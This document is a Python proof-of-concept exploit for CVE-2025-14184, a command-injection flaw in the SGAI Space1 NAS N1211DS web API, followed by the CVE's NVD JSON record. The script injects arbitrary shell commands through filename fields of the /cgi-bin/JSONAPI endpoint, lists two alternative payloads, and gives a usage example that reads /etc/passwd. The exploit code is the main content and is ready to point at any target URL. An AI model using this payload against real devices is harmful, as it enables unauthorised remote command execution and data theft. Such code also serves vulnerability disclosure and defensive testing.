CVE-2025-14184

#!/usr/bin/env python3 # CVE-2025-14184 PoC - SGAI Space1 NAS Command Execution # Target: SGAI Space1 NAS N1211DS up to version 1.0.915 import requests import sys def exploit_cve_2025_14184(target_url, cmd="id"): """ Exploit command execution via JSONAPI endpoint Target: /cgi-bin/JSONAPI Vulnerable functions: RENAME_FILE, OPERATE_FILE, NGNIX_UPLOAD """ # Construct malicious payload for RENAME_FILE function payload = { "action": "RENAME_FILE", "filename": f"test.txt;{cmd}", "new_filename": "test2.txt" } # Alternative payload using OPERATE_FILE # payload = { # "action": "OPERATE_FILE", # "filepath": f"';{cmd};'", # "operation": "delete" # } # Alternative payload using NGNIX_UPLOAD # payload = { # "action": "NGNIX_UPLOAD", # "filename": f"';{cmd};'", # "filepath": "/tmp" # } try: response = requests.post( f"{target_url}/cgi-bin/JSONAPI", json=payload, timeout=10 ) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [command]") print(f"Example: {sys.argv[0]} http://192.168.1.100 'cat /etc/passwd'") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "id" result = exploit_cve_2025_14184(target, command) print(f"Command output:\n{result}")

{"cve": {"id": "CVE-2025-14184", "sourceIdentifier": "[email protected]", "published": "2025-12-07T05:15:49.747", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in SGAI Space1 NAS N1211DS up to 1.0.915. Impacted is the function RENAME_FILE/OPERATE_FILE/NGNIX_UPLOAD of the file /cgi-bin/JSONAPI of the component gsaiagent. This manipulation causes command injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://vuldb.com/?ctiid.334604", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334604", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698568", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698569", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698570", "source": "[email protected]"}, {"url": "https://www.notion.so/2b16cf4e528a80858abbf62b721a54b0", "source": "[email protected]"}, {"url": "https://www.notion.so/2b16cf4e528a80f2ada9dc83651a4013", "source": "[email protected]"}]}}